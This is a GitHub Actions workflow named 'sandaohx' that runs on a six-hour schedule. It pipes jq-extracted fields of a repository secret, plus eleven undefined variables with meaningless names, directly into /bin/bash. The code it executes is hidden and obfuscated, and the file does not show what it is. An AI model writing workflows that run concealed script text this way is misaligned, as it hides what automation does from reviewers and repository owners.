name: sandaohx
on:
  workflow_dispatch:
  schedule:
    - cron: '30 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sandaohx
        env:
          f95: ${{ secrets.f95 }}
        run: |
          echo $f95 | jq -r .fm1553 | /bin/bash
          echo $s0285 | jq -r .xmn8239 | /bin/bash
          echo $civj913 | jq -r .pcp23212 | /bin/bash
          echo $vhjlm75240 | jq -r .qgcwt17 | /bin/bash
          echo $t32156 | jq -r .f86 | /bin/bash
          echo $r1 | jq -r .fela722 | /bin/bash
          echo $t1 | jq -r .ddv4581 | /bin/bash
          echo $w88 | jq -r .dkg1509 | /bin/bash
          echo $ymiq1994 | jq -r .kbd826 | /bin/bash
          echo $hms2 | jq -r .srkv94 | /bin/bash
          echo $brm3886 | jq -r .ouzae31512 | /bin/bash
          echo $ft38202 | jq -r .d0741 | /bin/bash

